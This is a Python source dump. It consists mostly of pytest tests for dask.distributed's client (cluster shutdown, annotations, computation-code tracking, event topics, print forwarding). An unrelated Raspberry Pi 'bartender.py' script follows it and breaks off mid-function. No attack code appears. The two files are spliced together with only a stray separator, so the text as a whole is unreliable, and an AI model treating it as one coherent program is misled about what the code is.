@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.asyncio
@pytest.mark.parametrize("Worker", [Worker, Nanny])
async def test_file_descriptors_dont_leak(Worker):
    """Open file descriptors return to the baseline after cluster teardown."""
    pytest.importorskip("pandas")
    df = dask.datasets.timeseries(freq="10s", dtypes={"x": int, "y": float})
    proc = psutil.Process()
    before = proc.num_fds()
    async with Scheduler(dashboard_address=":0") as s:
        async with Worker(s.address), Worker(s.address), Client(
            s.address, asynchronous=True
        ):
            assert proc.num_fds() > before
            await df.sum().persist()
    # Descriptors may close asynchronously; poll up to ~10s
    start = time()
    while proc.num_fds() > before:
        await asyncio.sleep(0.01)
        assert time() < start + 10, (before, proc.num_fds())
@gen_test()
async def test_dashboard_link_cluster():
    """A cluster's dashboard_link override appears in the client HTML repr."""
    class MyCluster(LocalCluster):
        @property
        def dashboard_link(self):
            return "http://foo.com"
    async with MyCluster(
        processes=False, asynchronous=True, dashboard_address=":0"
    ) as cluster:
        async with Client(cluster, asynchronous=True) as client:
            assert "http://foo.com" in client._repr_html_()
@gen_test()
async def test_shutdown():
    """client.shutdown closes both the scheduler and its workers."""
    async with Scheduler(dashboard_address=":0") as s:
        async with Worker(s.address) as w:
            async with Client(s.address, asynchronous=True) as c:
                await c.shutdown()
            assert s.status == Status.closed
            assert w.status == Status.closed
@pytest.mark.asyncio
async def test_shutdown_localcluster(cleanup):
    """client.shutdown also closes the scheduler of a LocalCluster."""
    async with LocalCluster(
        n_workers=1, asynchronous=True, processes=False, dashboard_address=":0"
    ) as lc:
        async with Client(lc, asynchronous=True) as c:
            await c.shutdown()
        assert lc.scheduler.status == Status.closed
@gen_test()
async def test_config_inherited_by_subprocess():
    """dask config values set in the parent propagate to nanny subprocesses."""
    with dask.config.set(foo=100):
        async with LocalCluster(
            n_workers=1,
            asynchronous=True,
            processes=True,
            dashboard_address=":0",
        ) as lc:
            async with Client(lc, asynchronous=True) as c:
                assert await c.submit(dask.config.get, "foo") == 100
@gen_cluster(client=True)
async def test_futures_of_sorted(c, s, a, b):
    """futures_of returns futures in the collection's key order."""
    pytest.importorskip("dask.dataframe")
    df = await dask.datasets.timeseries(dtypes={"x": int}).persist()
    futures = futures_of(df)
    for k, f in zip(df.__dask_keys__(), futures):
        assert str(k) in str(f)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "10ms"})
async def test_profile_server(c, s, a, b):
    """server=True / scheduler=True profiles capture run() activity.

    Profiling is sampling-based, so the whole check is retried up to 5 times.
    """
    for i in range(5):
        try:
            x = c.map(slowinc, range(10), delay=0.01, workers=a.address, pure=False)
            await wait(x)
            await asyncio.gather(
                c.run(slowinc, 1, delay=0.5), c.run_on_scheduler(slowdec, 1, delay=0.5)
            )
            p = await c.profile(server=True)  # All worker servers
            assert "slowinc" in str(p)
            p = await c.profile(scheduler=True)  # Scheduler
            assert "slowdec" in str(p)
        except AssertionError:
            if i == 4:
                raise
            else:
                pass
        else:
            break
@gen_cluster(client=True)
async def test_await_future(c, s, a, b):
    """Futures are awaitable; awaiting an errored future raises its exception."""
    future = c.submit(inc, 1)
    async def f():  # flake8: noqa
        result = await future
        assert result == 2
    await f()
    future = c.submit(div, 1, 0)
    async def f():
        with pytest.raises(ZeroDivisionError):
            await future
    await f()
@gen_cluster(client=True)
async def test_as_completed_async_for(c, s, a, b):
    """as_completed supports async-for iteration over futures."""
    futures = c.map(inc, range(10))
    ac = as_completed(futures)
    results = []
    async def f():
        async for future in ac:
            result = await future
            results.append(result)
    await f()
    assert set(results) == set(range(1, 11))
@gen_cluster(client=True)
async def test_as_completed_async_for_results(c, s, a, b):
    """with_results=True yields (future, result) pairs without extra gathers."""
    futures = c.map(inc, range(10))
    ac = as_completed(futures, with_results=True)
    results = []
    async def f():
        async for future, result in ac:
            results.append(result)
    await f()
    assert set(results) == set(range(1, 11))
    # Results arrived with the completion events, not via separate gather calls
    assert not s.counters["op"].components[0]["gather"]
@gen_cluster(client=True)
async def test_as_completed_async_for_cancel(c, s, a, b):
    """Cancelled futures are still yielded by as_completed's async iterator."""
    x = c.submit(inc, 1)
    y = c.submit(sleep, 0.3)
    ac = as_completed([x, y])
    async def _():
        await asyncio.sleep(0.1)
        await y.cancel(asynchronous=True)
    c.loop.add_callback(_)
    L = []
    async def f():
        async for future in ac:
            L.append(future)
    await f()
    assert L == [x, y]
@gen_test()
async def test_async_with():
    """async with Client closes both the client and its implicit cluster."""
    async with Client(processes=False, dashboard_address=":0", asynchronous=True) as c:
        assert await c.submit(lambda x: x + 1, 10) == 11
    assert c.status == "closed"
    assert c.cluster.status == Status.closed
def test_client_sync_with_async_def(loop):
    """Both sync() and Client.sync can drive an async def function."""
    async def ff():
        await asyncio.sleep(0.01)
        return 1
    with cluster() as (s, [a, b]):
        with Client(s["address"], loop=loop) as c:
            assert sync(loop, ff) == 1
            assert c.sync(ff) == 1
@pytest.mark.skip(reason="known intermittent failure")
@gen_cluster(client=True)
async def test_dont_hold_on_to_large_messages(c, s, a, b):
    """After persisting, the original source array should become collectable."""
    np = pytest.importorskip("numpy")
    da = pytest.importorskip("dask.array")
    x = np.random.random(1000000)
    xr = weakref.ref(x)
    d = da.from_array(x, chunks=(100000,))
    d = d.persist()
    del x
    start = time()
    # Poll for the weakref to die; on timeout print who still holds it
    while xr() is not None:
        if time() > start + 5:
            # Help diagnosing
            from types import FrameType
            x = xr()
            if x is not None:
                del x
                rc = sys.getrefcount(xr())
                refs = gc.get_referrers(xr())
                print("refs to x:", rc, refs, gc.isenabled())
                frames = [r for r in refs if isinstance(r, FrameType)]
                for i, f in enumerate(frames):
                    print(
                        "frames #%d:" % i,
                        f.f_code.co_name,
                        f.f_code.co_filename,
                        sorted(f.f_locals),
                    )
            pytest.fail("array should have been destroyed")
        await asyncio.sleep(0.200)
@gen_cluster(client=True)
async def test_run_scheduler_async_def(c, s, a, b):
    """run and run_on_scheduler accept async def functions."""
    async def f(dask_scheduler):
        await asyncio.sleep(0.01)
        dask_scheduler.foo = "bar"
    await c.run_on_scheduler(f)
    assert s.foo == "bar"
    async def f(dask_worker):
        await asyncio.sleep(0.01)
        dask_worker.foo = "bar"
    await c.run(f)
    assert a.foo == "bar"
    assert b.foo == "bar"
@gen_cluster(client=True)
async def test_run_scheduler_async_def_wait(c, s, a, b):
    """wait=False fire-and-forget variants of run / run_on_scheduler still execute."""
    async def f(dask_scheduler):
        await asyncio.sleep(0.01)
        dask_scheduler.foo = "bar"
    await c.run_on_scheduler(f, wait=False)
    # Effect is eventually visible even without waiting
    while not hasattr(s, "foo"):
        await asyncio.sleep(0.01)
    assert s.foo == "bar"
    async def f(dask_worker):
        await asyncio.sleep(0.01)
        dask_worker.foo = "bar"
    await c.run(f, wait=False)
    while not hasattr(a, "foo") or not hasattr(b, "foo"):
        await asyncio.sleep(0.01)
    assert a.foo == "bar"
    assert b.foo == "bar"
@pytest.mark.skipif(WINDOWS, reason="frequently kills off the whole test suite")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_performance_report(c, s, a, b):
    """performance_report captures caller code per stacklevel and honors mode=."""
    pytest.importorskip("bokeh")
    da = pytest.importorskip("dask.array")
    async def f(stacklevel, mode=None):
        """
        We wrap this in a function so that the assertions aren't in the
        performanace report itself
        Also, we want this comment to appear
        """
        x = da.random.random((1000, 1000), chunks=(100, 100))
        with tmpfile(extension="html") as fn:
            async with performance_report(
                filename=fn, stacklevel=stacklevel, mode=mode
            ):
                await c.compute((x + x.T).sum())
            with open(fn) as f:
                data = f.read()
        return data
    # Ensure default kwarg maintains backward compatability
    data = await f(stacklevel=1)
    assert "Also, we want this comment to appear" in data
    assert "bokeh" in data
    assert "random" in data
    assert "Dask Performance Report" in data
    assert "x = da.random" in data
    assert "Threads: 4" in data
    assert "distributed.scheduler - INFO - Clear task state" in data
    assert dask.__version__ in data
    # stacklevel=2 captures code two frames back -- which in this case
    # is the testing function
    data = await f(stacklevel=2)
    assert "async def test_performance_report(c, s, a, b):" in data
    assert "Dask Performance Report" in data
    # stacklevel=0 or lower is overridden to stacklevel=1 so we don't see
    # distributed internals
    data = await f(stacklevel=0)
    assert "Also, we want this comment to appear" in data
    assert "Dask Performance Report" in data
    # mode="inline" embeds bokeh resources; mode="cdn" links to cdn.bokeh.org
    data = await f(stacklevel=1, mode="inline")
    assert "cdn.bokeh.org" not in data
    data = await f(stacklevel=1, mode="cdn")
    assert "cdn.bokeh.org" in data
@gen_cluster(nthreads=[])
async def test_client_gather_semaphore_loop(s):
    """The gather semaphore is bound to the client's own asyncio loop."""
    async with Client(s.address, asynchronous=True) as c:
        assert c._gather_semaphore._loop is c.loop.asyncio_loop
@gen_cluster(client=True)
async def test_as_completed_condition_loop(c, s, a, b):
    """as_completed's internal condition uses the client's asyncio loop."""
    seq = c.map(inc, range(5))
    ac = as_completed(seq)
    assert ac.condition._loop == c.loop.asyncio_loop
def test_client_connectionpool_semaphore_loop(s, a, b):
    """The rpc connection pool's semaphore uses the client's asyncio loop."""
    with Client(s["address"]) as c:
        assert c.rpc.semaphore._loop is c.loop.asyncio_loop
@pytest.mark.slow
@gen_cluster(nthreads=[], timeout=60)
async def test_mixed_compression(s):
    """Workers configured with different comm compression interoperate."""
    pytest.importorskip("lz4")
    da = pytest.importorskip("dask.array")
    async with Nanny(
        s.address, nthreads=1, config={"distributed.comm.compression": None}
    ):
        async with Nanny(
            s.address, nthreads=1, config={"distributed.comm.compression": "lz4"}
        ):
            async with Client(s.address, asynchronous=True) as c:
                await c.get_versions()
                # x + x.T forces worker-to-worker transfers across the two configs
                x = da.ones((10000, 10000))
                y = x + x.T
                await c.compute(y.sum())
@gen_cluster(client=True)
async def test_futures_in_subgraphs(c, s, a, b):
    """Regression test of <https://github.com/dask/distributed/issues/4145>"""
    dd = pytest.importorskip("dask.dataframe")
    import pandas as pd
    ddf = dd.from_pandas(
        pd.DataFrame(
            dict(
                uid=range(50),
                enter_time=pd.date_range(
                    start="2020-01-01", end="2020-09-01", periods=50, tz="UTC"
                ),
            )
        ),
        npartitions=5,
    )
    # Build layered graphs over a persisted (futures-backed) frame, then
    # submit a function that itself takes the collection as an argument
    ddf = ddf[ddf.uid.isin(range(29))].persist()
    ddf["local_time"] = ddf.enter_time.dt.tz_convert("US/Central")
    ddf["day"] = ddf.enter_time.dt.day_name()
    ddf = await c.submit(dd.categorical.categorize, ddf, columns=["day"], index=False)
@gen_cluster(client=True)
async def test_get_task_metadata(c, s, a, b):
    """get_task_metadata collects metadata and final states, then unregisters."""
    # Populate task metadata
    await c.register_worker_plugin(TaskStateMetadataPlugin())
    async with get_task_metadata() as tasks:
        f = c.submit(slowinc, 1)
        await f
    metadata = tasks.metadata
    assert f.key in metadata
    assert metadata[f.key] == s.tasks.get(f.key).metadata
    state = tasks.state
    assert f.key in state
    assert state[f.key] == "memory"
    # Leaving the context removes the collection plugin from the scheduler
    assert not any(isinstance(p, CollectTaskMetaDataPlugin) for p in s.plugins)
@gen_cluster(client=True)
async def test_get_task_metadata_multiple(c, s, a, b):
    """Nested get_task_metadata contexts only collect their own tasks."""
    # Populate task metadata
    await c.register_worker_plugin(TaskStateMetadataPlugin())
    # Ensure that get_task_metadata only collects metadata for
    # tasks which are submitted and completed within its context
    async with get_task_metadata() as tasks1:
        f1 = c.submit(slowinc, 1)
        await f1
        async with get_task_metadata() as tasks2:
            f2 = c.submit(slowinc, 2)
            await f2
    metadata1 = tasks1.metadata
    metadata2 = tasks2.metadata
    assert len(metadata1) == 2
    assert sorted(metadata1.keys()) == sorted([f1.key, f2.key])
    assert metadata1[f1.key] == s.tasks.get(f1.key).metadata
    assert metadata1[f2.key] == s.tasks.get(f2.key).metadata
    assert len(metadata2) == 1
    assert list(metadata2.keys()) == [f2.key]
    assert metadata2[f2.key] == s.tasks.get(f2.key).metadata
@gen_cluster(client=True)
async def test_log_event(c, s, a, b):
    """Events logged from worker, scheduler, and client are readable via get_events."""
    # Log an event from inside a task
    def foo():
        get_worker().log_event("topic1", {"foo": "bar"})
    assert not await c.get_events("topic1")
    await c.submit(foo)
    events = await c.get_events("topic1")
    assert len(events) == 1
    assert events[0][1] == {"foo": "bar"}
    # Log an event while on the scheduler
    def log_scheduler(dask_scheduler):
        dask_scheduler.log_event("topic2", {"woo": "hoo"})
    await c.run_on_scheduler(log_scheduler)
    events = await c.get_events("topic2")
    assert len(events) == 1
    assert events[0][1] == {"woo": "hoo"}
    # Log an event from the client process
    await c.log_event("topic2", ("alice", "bob"))
    events = await c.get_events("topic2")
    assert len(events) == 2
    assert events[1][1] == ("alice", "bob")
@gen_cluster(client=True)
async def test_annotations_task_state(c, s, a, b):
    """dask.annotate values land on the scheduler's TaskState.annotations."""
    da = pytest.importorskip("dask.array")
    with dask.annotate(qux="bar", priority=100):
        x = da.ones(10, chunks=(5,))
    # Fusion would merge layers and could drop per-layer annotations
    with dask.config.set(optimization__fuse__active=False):
        x = await x.persist()
    assert all(
        {"qux": "bar", "priority": 100} == ts.annotations for ts in s.tasks.values()
    )
@pytest.mark.parametrize("fn", ["compute", "persist"])
def test_annotations_compute_time(fn):
    """Annotations applied at compute/persist time reach the scheduler."""
    da = pytest.importorskip("dask.array")
    @gen_cluster(client=True)
    async def test(c, s, a, b):
        x = da.ones(10, chunks=(5,))
        with dask.annotate(foo="bar"):
            # Turn off optimization to avoid rewriting layers and picking up annotations
            # that way. Instead, we want `compute`/`persist` to be able to pick them up.
            x = await getattr(c, fn)(x, optimize_graph=False)
        assert all({"foo": "bar"} == ts.annotations for ts in s.tasks.values())
    test()
@pytest.mark.xfail(reason="https://github.com/dask/dask/issues/7036")
@gen_cluster(client=True)
async def test_annotations_survive_optimization(c, s, a, b):
    """Layer annotations should survive dask.optimize (currently xfail)."""
    da = pytest.importorskip("dask.array")
    with dask.annotate(foo="bar"):
        x = da.ones(10, chunks=(5,))
        ann = x.__dask_graph__().layers[x.name].annotations
        assert ann is not None
        assert ann.get("foo", None) == "bar"
    (xx,) = dask.optimize(x)
    ann = xx.__dask_graph__().layers[x.name].annotations
    assert ann is not None
    assert ann.get("foo", None) == "bar"
@gen_cluster(client=True)
async def test_annotations_priorities(c, s, a, b):
    """priority annotations are reflected in scheduler task priorities."""
    da = pytest.importorskip("dask.array")
    with dask.annotate(priority=15):
        x = da.ones(10, chunks=(5,))
    with dask.config.set(optimization__fuse__active=False):
        x = await x.persist()
    assert all("15" in str(ts.priority) for ts in s.tasks.values())
    # Higher user priority sorts first, hence the negated leading element
    assert all(ts.priority[0] == -15 for ts in s.tasks.values())
    assert all({"priority": 15} == ts.annotations for ts in s.tasks.values())
@gen_cluster(client=True)
async def test_annotations_workers(c, s, a, b):
    da = pytest.importorskip("dask.array")

    with dask.annotate(workers=[a.address]):
        arr = da.ones(10, chunks=(5,))

    with dask.config.set(optimization__fuse__active=False):
        arr = await arr.persist()

    for ts in s.tasks.values():
        assert ts.annotations == {"workers": (a.address,)}
        assert ts.worker_restrictions == {a.address}

    # Everything must have landed on worker `a`, nothing on `b`.
    assert a.data
    assert not b.data
@gen_cluster(client=True)
async def test_annotations_retries(c, s, a, b):
    da = pytest.importorskip("dask.array")

    with dask.annotate(retries=2):
        arr = da.ones(10, chunks=(5,))

    with dask.config.set(optimization__fuse__active=False):
        arr = await arr.persist()

    for ts in s.tasks.values():
        assert ts.retries == 2
        assert ts.annotations == {"retries": 2}
@gen_cluster(client=True)
async def test_annotations_blockwise_unpack(c, s, a, b):
    da = pytest.importorskip("dask.array")
    np = pytest.importorskip("numpy")
    from dask.array.utils import assert_eq

    # A flaky doubling function -- needs extra successes because it is called
    # once up front to establish dtype/meta before real application.
    scale = varying([ZeroDivisionError("one"), ZeroDivisionError("two"), 2, 2])

    def flaky_double(x):
        return scale() * x

    # A reliable doubling function.
    def reliable_double(x):
        return 2 * x

    arr = da.ones(10, chunks=(5,))

    # The later annotation must not override the earlier one.
    with dask.annotate(retries=2):
        doubled = arr.map_blocks(flaky_double, meta=np.array((), dtype=float))
    with dask.annotate(retries=0):
        quadrupled = doubled.map_blocks(reliable_double, meta=np.array((), dtype=float))

    with dask.config.set(optimization__fuse__active=False):
        result = await c.compute(quadrupled)

    assert_eq(result, np.ones(10) * 4.0)
@gen_cluster(
    client=True,
    nthreads=[
        ("127.0.0.1", 1),
        ("127.0.0.1", 1, {"resources": {"GPU": 1}}),
    ],
)
async def test_annotations_resources(c, s, a, b):
    da = pytest.importorskip("dask.array")

    with dask.annotate(resources={"GPU": 1}):
        arr = da.ones(10, chunks=(5,))

    with dask.config.set(optimization__fuse__active=False):
        arr = await arr.persist()

    for ts in s.tasks.values():
        assert ts.resource_restrictions == {"GPU": 1}
        assert ts.annotations == {"resources": {"GPU": 1}}
@gen_cluster(
    client=True,
    nthreads=[
        ("127.0.0.1", 1),
        ("127.0.0.1", 1, {"resources": {"GPU": 1}}),
    ],
)
async def test_annotations_resources_culled(c, s, a, b):
    da = pytest.importorskip("dask.array")

    arr = da.ones((2, 2, 2), chunks=1)
    with dask.annotate(resources={"GPU": 1}):
        mapped = arr.map_blocks(lambda x0: x0, meta=arr._meta)

    # Select a single element so most of the graph gets culled.
    elem = mapped[0, 0, 0]
    (fut,) = c.compute([elem], optimize_graph=False)
    # Completing without error is the whole point of this test.
    await fut
@gen_cluster(client=True)
async def test_annotations_loose_restrictions(c, s, a, b):
    da = pytest.importorskip("dask.array")

    # Would eventually fail if allow_other_workers=False, since the worker
    # "fake" never joins the cluster.
    with dask.annotate(workers=["fake"], allow_other_workers=True):
        arr = da.ones(10, chunks=(5,))

    with dask.config.set(optimization__fuse__active=False):
        arr = await arr.persist()

    expected = {"workers": ("fake",), "allow_other_workers": True}
    for ts in s.tasks.values():
        assert not ts.worker_restrictions
        assert ts.host_restrictions == {"fake"}
        assert ts.annotations == expected
@gen_cluster(client=True)
async def test_workers_collection_restriction(c, s, a, b):
    da = pytest.importorskip("dask.array")

    # Restrict a whole collection to worker `a` via the compute kwarg.
    await c.compute(da.arange(10), workers=a.address)
    assert a.data and not b.data
@gen_cluster(client=True, nthreads=[("127.0.0.1", 0)])
async def test_get_client_functions_spawn_clusters(c, s, a):
    # see gh4565
    scheduler_addr = c.scheduler.address

    def f(x):
        # Inside a task, spin up a fresh in-process cluster with its own
        # client; get_client() must still resolve to the *outer* scheduler.
        with LocalCluster(
            n_workers=1,
            processes=False,
            dashboard_address=":0",
            worker_dashboard_address=":0",
        ) as cluster2:
            with Client(cluster2) as c1:
                c2 = get_client()

                inner_addr = c1.scheduler.address
                outer_addr = c2.scheduler.address
                assert inner_addr != outer_addr
                assert outer_addr == scheduler_addr

    await c.gather(c.map(f, range(2)))

    await a.close()
    assert default_client() is c
def test_computation_code_walk_frames():
    # _get_computation_code walks the stack; called directly from a test
    # function it should return that function's own source.
    test_function_code = inspect.getsource(test_computation_code_walk_frames)
    code = Client._get_computation_code()

    assert test_function_code == code

    def nested_call():
        return Client._get_computation_code()

    # One level of nesting: the innermost non-ignored frame wins.
    assert nested_call() == inspect.getsource(nested_call)

    # ignore-modules must be a list, not a bare string.
    with pytest.raises(TypeError, match="Ignored modules must be a list"):
        with dask.config.set(
            {"distributed.diagnostics.computations.ignore-modules": "test_client"}
        ):
            code = Client._get_computation_code()

    # With this module ignored, the walk should skip up to the caller's frame.
    with dask.config.set(
        {"distributed.diagnostics.computations.ignore-modules": ["test_client"]}
    ):
        import sys

        upper_frame_code = inspect.getsource(sys._getframe(1))
        code = Client._get_computation_code()
        assert code == upper_frame_code
        assert nested_call() == upper_frame_code
def test_computation_object_code_dask_compute(client):
    da = pytest.importorskip("dask.array")

    arr = da.ones((10, 10), chunks=(3, 3))
    arr.sum().compute()

    expected_code = inspect.getsource(test_computation_object_code_dask_compute)

    def fetch_comp_code(dask_scheduler):
        computations = list(dask_scheduler.computations)
        assert len(computations) == 1
        (comp,) = computations
        assert len(comp.code) == 1
        return comp.code[0]

    # The scheduler should have recorded this very test function as the code.
    assert client.run_on_scheduler(fetch_comp_code) == expected_code
def test_computation_object_code_not_available(client):
    np = pytest.importorskip("numpy")
    pd = pytest.importorskip("pandas")
    dd = pytest.importorskip("dask.dataframe")

    df = pd.DataFrame({"a": range(10)})
    ddf = dd.from_pandas(df, npartitions=3)
    # np.where triggers computation from inside numpy, where no user-level
    # source code can be located.
    np.where(ddf.a > 4)

    def fetch_comp_code(dask_scheduler):
        computations = list(dask_scheduler.computations)
        assert len(computations) == 1
        (comp,) = computations
        assert len(comp.code) == 1
        return comp.code[0]

    assert client.run_on_scheduler(fetch_comp_code) == "<Code not available>"
@gen_cluster(client=True)
async def test_computation_object_code_dask_persist(c, s, a, b):
    da = pytest.importorskip("dask.array")

    arr = da.ones((10, 10), chunks=(3, 3))
    await arr.sum().persist()

    # gen_cluster wraps the coroutine, so the original lives on __wrapped__.
    expected = inspect.getsource(
        test_computation_object_code_dask_persist.__wrapped__
    )

    computations = list(s.computations)
    assert len(computations) == 1
    (comp,) = computations
    assert len(comp.code) == 1
    assert comp.code[0] == expected
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_simple(c, s, a, b):
    def func(x):
        return x

    await c.submit(func, 1)

    expected = inspect.getsource(
        test_computation_object_code_client_submit_simple.__wrapped__
    )

    computations = list(s.computations)
    assert len(computations) == 1
    (comp,) = computations
    assert len(comp.code) == 1
    assert comp.code[0] == expected
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_list_comp(c, s, a, b):
    def func(x):
        return x

    futs = [c.submit(func, n) for n in range(10)]
    await c.gather(futs)

    expected = inspect.getsource(
        test_computation_object_code_client_submit_list_comp.__wrapped__
    )

    computations = list(s.computations)
    assert len(computations) == 1
    (comp,) = computations
    # All ten submits share one code entry: code is deduplicated.
    assert len(comp.code) == 1
    assert comp.code[0] == expected
@gen_cluster(client=True)
async def test_computation_object_code_client_submit_dict_comp(c, s, a, b):
    def func(x):
        return x

    futs = {n: c.submit(func, n) for n in range(10)}
    await c.gather(futs)

    expected = inspect.getsource(
        test_computation_object_code_client_submit_dict_comp.__wrapped__
    )

    computations = list(s.computations)
    assert len(computations) == 1
    (comp,) = computations
    # All ten submits share one code entry: code is deduplicated.
    assert len(comp.code) == 1
    assert comp.code[0] == expected
@gen_cluster(client=True)
async def test_computation_object_code_client_map(c, s, a, b):
    da = pytest.importorskip("dask.array")

    # NOTE(review): despite the name this exercises c.compute -- the body is
    # identical to test_computation_object_code_client_compute; confirm intent.
    arr = da.ones((10, 10), chunks=(3, 3))
    fut = c.compute(arr.sum(), retries=2)
    await fut

    expected = inspect.getsource(
        test_computation_object_code_client_map.__wrapped__
    )

    computations = list(s.computations)
    assert len(computations) == 1
    (comp,) = computations
    assert len(comp.code) == 1
    assert comp.code[0] == expected
@gen_cluster(client=True)
async def test_computation_object_code_client_compute(c, s, a, b):
    da = pytest.importorskip("dask.array")

    arr = da.ones((10, 10), chunks=(3, 3))
    fut = c.compute(arr.sum(), retries=2)
    await fut

    expected = inspect.getsource(
        test_computation_object_code_client_compute.__wrapped__
    )

    computations = list(s.computations)
    assert len(computations) == 1
    (comp,) = computations
    assert len(comp.code) == 1
    assert comp.code[0] == expected
@gen_cluster(client=True, Worker=Nanny)
async def test_upload_directory(c, s, a, b, tmp_path):
    from dask.distributed import UploadDirectory

    # Snapshot of the local working directory, to verify nothing leaks in.
    files = set(os.listdir())

    # Two modules where one imports the other, to prove the whole directory
    # (not just single files) is importable on the workers.
    with open(tmp_path / "foo.py", "w") as f:
        f.write("x = 123")
    with open(tmp_path / "bar.py", "w") as f:
        f.write("from foo import x")

    plugin = UploadDirectory(tmp_path, restart=True, update_path=True)
    await c.register_worker_plugin(plugin)

    [name] = a.plugins
    assert os.path.split(tmp_path)[-1] in name

    def f():
        import bar

        return bar.x

    results = await c.run(f)
    assert results[a.worker_address] == 123
    assert results[b.worker_address] == 123

    # A worker that joins *after* registration must also get the directory.
    async with Nanny(s.address, local_directory=tmp_path / "foo", name="foo") as n:
        results = await c.run(f)
        assert results[n.worker_address] == 123

    assert files == set(os.listdir())  # no change
@gen_cluster(client=True)
async def test_exception_text(c, s, a, b):
    def bad(x):
        raise Exception(x)

    fut = c.submit(bad, 123)
    await wait(fut)

    ts = s.tasks[fut.key]
    # Scheduler stores both the exception and the traceback as plain strings.
    assert isinstance(ts.exception_text, str)
    assert "123" in ts.exception_text
    assert "Exception(x)" in ts.traceback_text
    assert "bad" in ts.traceback_text
@gen_cluster(client=True)
async def test_async_task(c, s, a, b):
    async def f(x):
        return x + 1

    # Coroutine functions are valid task callables.
    assert await c.submit(f, 10) == 11
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_events_subscribe_topic(c, s, a):
    log = []

    def user_event_handler(event):
        log.append(event)

    c.subscribe_topic("test-topic", user_event_handler)
    # Wait until the scheduler has registered the subscription.
    while not s.event_subscriber["test-topic"]:
        await asyncio.sleep(0.01)

    a.log_event("test-topic", {"important": "event"})
    # Wait for the event to reach the client-side handler.
    while len(log) != 1:
        await asyncio.sleep(0.01)

    time_, msg = log[0]
    assert isinstance(time_, float)
    assert msg == {"important": "event"}

    c.unsubscribe_topic("test-topic")
    while s.event_subscriber["test-topic"]:
        await asyncio.sleep(0.01)

    a.log_event("test-topic", {"forget": "me"})
    # Wait for the scheduler to record the second event...
    while len(s.events["test-topic"]) == 1:
        await asyncio.sleep(0.01)
    # ...and confirm it was NOT delivered to the unsubscribed handler.
    assert len(log) == 1

    async def async_user_event_handler(event):
        log.append(event)
        await asyncio.sleep(0)

    # Async handlers are supported too.
    c.subscribe_topic("test-topic", async_user_event_handler)
    while not s.event_subscriber["test-topic"]:
        await asyncio.sleep(0.01)

    a.log_event("test-topic", {"async": "event"})
    while len(log) == 1:
        await asyncio.sleep(0.01)
    assert len(log) == 2

    time_, msg = log[1]
    assert isinstance(time_, float)
    assert msg == {"async": "event"}

    # Even though the middle event was not subscribed to, the scheduler still
    # knows about all and we can retrieve them
    all_events = await c.get_events(topic="test-topic")
    assert len(all_events) == 3
@gen_cluster(client=True, nthreads=[("", 1)])
async def test_events_all_servers_use_same_channel(c, s, a):
    """Ensure that logs from all server types (scheduler, worker, nanny)
    and the clients themselves arrive"""
    received = []

    def user_event_handler(event):
        received.append(event)

    c.subscribe_topic("test-topic", user_event_handler)
    # Wait until the scheduler has registered the subscription.
    while not s.event_subscriber["test-topic"]:
        await asyncio.sleep(0.01)

    async with Nanny(s.address) as n:
        a.log_event("test-topic", "worker")
        n.log_event("test-topic", "nanny")
        s.log_event("test-topic", "scheduler")
        await c.log_event("test-topic", "client")

        # Wait for four *distinct* events to arrive.
        while not len(received) == 4 == len(set(received)):
            await asyncio.sleep(0.1)
@gen_cluster(client=True, nthreads=[])
async def test_events_unsubscribe_raises_if_unknown(c, s):
    # Unsubscribing a topic that was never subscribed must fail loudly.
    expected = "No event handler known for topic unknown"
    with pytest.raises(ValueError, match=expected):
        c.unsubscribe_topic("unknown")
@gen_cluster(client=True)
async def test_log_event_warn(c, s, a, b):
    def foo():
        # Logging to a topic list containing "warn" surfaces the payload
        # as a client-side warning.
        get_worker().log_event(["foo", "warn"], "Hello!")

    with pytest.warns(Warning, match="Hello!"):
        await c.submit(foo)
@gen_cluster(client=True)
async def test_log_event_warn_dask_warns(c, s, a, b):
    from dask.distributed import warn

    def foo():
        # dask.distributed.warn inside a task propagates to the client.
        warn("Hello!")

    with pytest.warns(Warning, match="Hello!"):
        await c.submit(foo)
@gen_cluster(client=True, Worker=Nanny)
async def test_print(c, s, a, b, capsys):
    from dask.distributed import print

    def foo():
        print("Hello!", 123, sep=":")

    await c.submit(foo)

    # The worker-side print is forwarded and re-emitted on the client.
    captured = capsys.readouterr()
    assert "Hello!:123" in captured.out
@gen_cluster(client=True, Worker=Nanny)
async def test_print_non_msgpack_serializable(c, s, a, b, capsys):
    from dask.distributed import print

    def foo():
        # Not msgpack-serializable; should still be forwarded as its repr.
        print(object())

    await c.submit(foo)

    captured = capsys.readouterr()
    assert "<object object at" in captured.out
def test_print_simple(capsys):
    from dask.distributed import print

    # Outside any worker/client context, dask's print falls back to builtin
    # behaviour.
    print("Hello!", 123, sep=":")
    captured = capsys.readouterr()
    assert "Hello!:123" in captured.out
|
bartender.py | import gaugette.ssd1306
import gaugette.platform
import gaugette.gpio
import time
import sys
import RPi.GPIO as GPIO
import json
import threading
import traceback
import board
import neopixel
from menu import MenuItem, Menu, Back, MenuContext, MenuDelegate
from drinks import drink_list, drink_options
# Use Broadcom (BCM) pin numbering for all GPIO calls below.
GPIO.setmode(GPIO.BCM)

# OLED display dimensions in pixels.
SCREEN_WIDTH = 128
SCREEN_HEIGHT = 64

# Button wiring and software debounce windows (milliseconds).
LEFT_BTN_PIN = 13
LEFT_PIN_BOUNCE = 1000
RIGHT_BTN_PIN = 5
RIGHT_PIN_BOUNCE = 2000

# SSD1306 control pins.
OLED_RESET_PIN = 15
OLED_DC_PIN = 16

# NeoPixel strip: pixel count and colour byte order.
num_pixels = 57
ORDER = neopixel.GRB

# Pump flow rate multiplier applied to ingredient amounts in makeDrink --
# presumably seconds of pumping per unit volume; TODO confirm units.
FLOW_RATE = 50.0/100.0

# Module-level cache of the menu item currently shown on screen.
screenItem = 'IU-SUCKS'

pixel_pin = board.D18

# setup pixels:
pixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.3, auto_write=False, pixel_order=ORDER)
def wheel(pos):
    """Map a position 0-255 onto an (r, g, b) colour wheel.

    The colours transition r -> g -> b -> back to r; out-of-range
    positions yield black.
    """
    if pos < 0 or pos > 255:
        return (0, 0, 0)
    if pos < 85:
        # Red rises, green falls.
        return (int(pos * 3), int(255 - pos * 3), 0)
    if pos < 170:
        # Red falls, blue rises.
        pos -= 85
